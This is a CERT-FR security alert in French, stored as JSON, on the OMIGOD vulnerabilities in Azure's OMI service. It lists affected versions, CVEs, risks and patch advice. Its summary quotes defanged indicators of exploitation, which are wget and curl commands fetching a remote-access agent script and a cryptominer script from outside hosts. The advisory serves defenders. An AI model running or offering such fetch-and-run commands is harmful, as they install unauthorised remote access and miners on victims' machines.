{"$ref":"https://www.cert.ssi.gouv.fr/openapi.json","affected_systems":[{"description":"System Center Operations Manager (SCOM) On-Premises OMI versions ant\u00e9rieures \u00e0 v1.6.8-1 (OMI framework est utilis\u00e9 pour la surveillance de Linux / Unix)","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.71.X.XX ant\u00e9rieures \u00e0 2.71.1.25","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.0.0.0","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Azure Automation (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Azure Security Center (Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Azure Automation State Configuration, DSC Extension (On-Premises) OMI versions ant\u00e9rieures \u00e0 v1.6.8-1 (OMI framework est un pr\u00e9-requis pour installer pour l'agent DSC )","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 3.0.0.1 ant\u00e9rieures \u00e0 3.0.0.3","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Log Analytics Agent (On-Premises et Cloud) OMS Agent pour Linux GA versions 1.13.35 et ant\u00e9rieures","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"le paquet OMI (On-Premises et Cloud) versions ant\u00e9rieures \u00e0 v1.6.8-1","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.70.X.XX ant\u00e9rieures \u00e0 2.70.0.30","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Azure Diagnostics (LAD) (Cloud) versions 4.0.0 \u00e0 4.0.5 ant\u00e9rieures \u00e0 4.0.11","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Container Monitoring Solution (Cloud) d\u00e9ploy\u00e9 avec une image docker ayant un SHA ID diff\u00e9rent de 12b7682d8f9a2f67752bf121029e315abcae89bc0c34a0e05f07baec72280707","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Azure Diagnostics (LAD) (Cloud) versions 3.0.131 et ant\u00e9rieures","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}},{"description":"Azure Automation Update Management (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures","product":{"name":"Azure","vendor":{"name":"Microsoft","scada":false}}}],"affected_systems_content":"","closed_at":"2022-01-05","content":"## Solution\n\nLe CERT-FR recommande fortement la mise \u00e0 jour des extensions\nvuln\u00e9rables. Pour cela, dans le cadre d'un d\u00e9ploiement dans le *Cloud*,\nveuillez vous assurer que la mise \u00e0 jour a bien \u00e9t\u00e9 appliqu\u00e9e, sinon\ndans le cas contraire l'effectuer manuellement. En ce qui concerne les\nd\u00e9ploiements *OnPremises,* les mises \u00e0 jour des extensions vuln\u00e9rables\ndoivent \u00eatre r\u00e9alis\u00e9es manuellement. Afin d'identifier les\nextensions concern\u00e9es par ces vuln\u00e9rabilit\u00e9s, les utilisateurs peuvent\nutiliser Azure Portal ou Azure CLI comme d\u00e9crit dans la documentation de\nMicrosoft \\[3\\].\n\n**Le CERT-FR rappelle \u00e9galement que ce type de service ne doit pas \u00eatre\nexpos\u00e9 sur Internet. De plus, il est fortement recommand\u00e9 de filtrer\nl\u2019acc\u00e8s des ports susmentionn\u00e9s associ\u00e9s au service OMI uniquement aux\nmachines d'administration autoris\u00e9es.** \n","cves":[{"name":"CVE-2021-38648","url":"https://www.cve.org/CVERecord?id=CVE-2021-38648"},{"name":"CVE-2021-38647","url":"https://www.cve.org/CVERecord?id=CVE-2021-38647"},{"name":"CVE-2021-38645","url":"https://www.cve.org/CVERecord?id=CVE-2021-38645"},{"name":"CVE-2021-38649","url":"https://www.cve.org/CVERecord?id=CVE-2021-38649"}],"links":[{"title":"[4] Aide pour l'utilisation de Azure Sentinel","url":"https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093"},{"title":"[1] Publication de l'\u00e9quipe de chercheurs en vuln\u00e9rabilit\u00e9s de Wiz","url":"https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure"},{"title":"[5] Avis CERT-FR du 15 septembre 2021","url":"https://www.cert.ssi.gouv.fr/avis/CERTFR-2021-AVI-711/"},{"title":"[3] Documentation de Microsoft","url":"https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/features-linux#discover-vm-extensions"},{"title":"[2] Recommandations suppl\u00e9mentaires pour les vuln\u00e9rabilit\u00e9s OMIGOD","url":"https://msrc-blog.microsoft.com/2021/09/16/additional-guidance-regarding-omi-vulnerabilities-within-azure-vm-management-extensions/"}],"reference":"CERTFR-2021-ALE-020","revisions":[{"description":"Version initiale","revision_date":"2021-09-17T00:00:00.000000"},{"description":"Ajout de la r\u00e9f\u00e9rence \u00e0 l'avis CERT-FR","revision_date":"2021-09-22T00:00:00.000000"},{"description":"Cl\u00f4ture de l'alerte. Cela ne signifie pas la fin d'une menace. Seule l'application de la mise \u00e0 jour permet de vous pr\u00e9munir contre l'exploitation de la vuln\u00e9rabilit\u00e9 correspondante.","revision_date":"2022-01-05T00:00:00.000000"}],"risks":[{"description":"\u00c9l\u00e9vation de privil\u00e8ges"},{"description":"Ex\u00e9cution de code arbitraire \u00e0 distance"}],"summary":"\\[Version du 20 septembre 2021\\]\n\nLe 18 septembre Microsoft a publi\u00e9\nun article afin d'expliquer comment Azure Sentinel peut aider \u00e0 la\nrecherche d'une compromission notamment l'exploitation des\nvuln\u00e9rabilit\u00e9s OMIGOD \\[4\\]. De plus, \u00e0 cette occasion, les marqueurs\nsuivants, qui correspondent \u00e0 des traces li\u00e9es \u00e0 une tentative\nd'exploitation, ont \u00e9t\u00e9 propos\u00e9s par Microsoft : \n\n- wget\n https://www\\[.\\]dwservice\\[.\\]net/download/dwagent_generic\\[.\\]sh\u00a0\n -O dwagent_generic.sh\n- echo curl\n https://www\\[.\\]dwservice\\[.\\]net/download/dwagent_generic\\[.\\]sh\u00a0\n --output dw.sh \\> go.sh\n- curl -fSsL\n http://104\\[.\\]168\\[.\\]213\\[.\\]31:55879/coinlinux/runMiner\\[.\\]sh\n\n\\[Version initiale\\]\n\nLe 14 septembre 2021, une \u00e9quipe de chercheurs en vuln\u00e9rabilit\u00e9s a\nd\u00e9couvert quatre vuln\u00e9rabilit\u00e9s dans Microsoft Azure, la plateforme\ncloud de Microsoft \\[1\\]. Ces vuln\u00e9rabilit\u00e9s sont situ\u00e9es au sein du\nservice OMI, lequel est d\u00e9ploy\u00e9 dans l'\u00e9cosyst\u00e8me Azure. Ces\nvuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 regroup\u00e9es sous l\u2019appellation de \u00ab *OMIGOD* \u00bb. Le\nservice OMI est le pendant open-source pour la famille de syst\u00e8mes\nd'exploitation de type Linux ou Unix de WMI (Windows Management\nInfrastructure) et permet la gestion des configurations dans des\nenvironnements distants et locaux.\n\n\u00a0\n\nEn particulier, la vuln\u00e9rabilit\u00e9 immatricul\u00e9e CVE-2021-38647 permet \u00e0 un\nattaquant non authentifi\u00e9 de r\u00e9aliser une ex\u00e9cution de code arbitraire\navec les privil\u00e8ges de l'utilisateur *root*. Elle impacte uniquement les\nentit\u00e9s utilisant les solutions de gestion Linux (*On-Premises* SCOM,\nAzure Automation State Configuration ou Azure Desired State\nConfiguration extension) lorsque la gestion \u00e0 distance est activ\u00e9e.\n\n\u00a0\n\nPour des besoins de gestion \u00e0 distance, il est possible que les ports\nassoci\u00e9s \u00e0 OMI (5986 / 5985 / 1270) soient accessibles depuis Internet.\nDans ce cas, la vuln\u00e9rabilit\u00e9 peut \u00eatre exploit\u00e9e afin d'obtenir un\nacc\u00e8s initial \u00e0 un environnement Azure pour ensuite pouvoir se d\u00e9placer\nlat\u00e9ralement au sein du syst\u00e8me d'information, en tirant notamment parti\ndes trois autres vuln\u00e9rabilit\u00e9s, qui permettent une \u00e9l\u00e9vation de\nprivil\u00e8ges locale.\n\n\u00a0\n\nDans le cadre de son Patch Tuesday, en date du 14 septembre 2021 \\[5\\],\nMicrosoft a ainsi mis \u00e0 disposition un correctif pour ces quatre\nvuln\u00e9rabilit\u00e9s :\n\n- CVE-2021-38647 : Avec un score CVSSv3 \u00e0 9.8 et permettant \u00e0 un\n attaquant de pouvoir ex\u00e9cuter du code arbitraire \u00e0 distance ;\n- CVE-2021-38648 : Avec un score CVSSv3 \u00e0 7.8 et permettant \u00e0 un\n attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges ;\n- CVE-2021-38645 :\u00a0Avec un score CVSSv3 \u00e0 7.8 et permettant \u00e0 un\n attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges ;\n- CVE-2021-38649 :\u00a0Avec un score CVSSv3 \u00e0 7.0 et permettant \u00e0 un\n attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges\n\n
\n\n\u00a0\n\n
\n\nDes codes d'exploitation sont publiquement disponibles sur Internet\npour la CVE-2021-38647, ce qui signifie que l\u2019exploitation de cette\nvuln\u00e9rabilit\u00e9 est imminente ou d\u00e9j\u00e0 en cours.\n\n
\n\n
\n\n
\n\n
\n","title":"[Maj] Multiples vuln\u00e9rabilit\u00e9s dans Microsoft Azure Open Management Infrastructure","vendor_advisories":[{"published_at":"2021-09-16","title":"Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38648","url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648"},{"published_at":"2021-09-16","title":"Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38649","url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649"},{"published_at":"2021-09-16","title":"Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38645","url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645"},{"published_at":"2021-09-16","title":"Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38647","url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647"}]}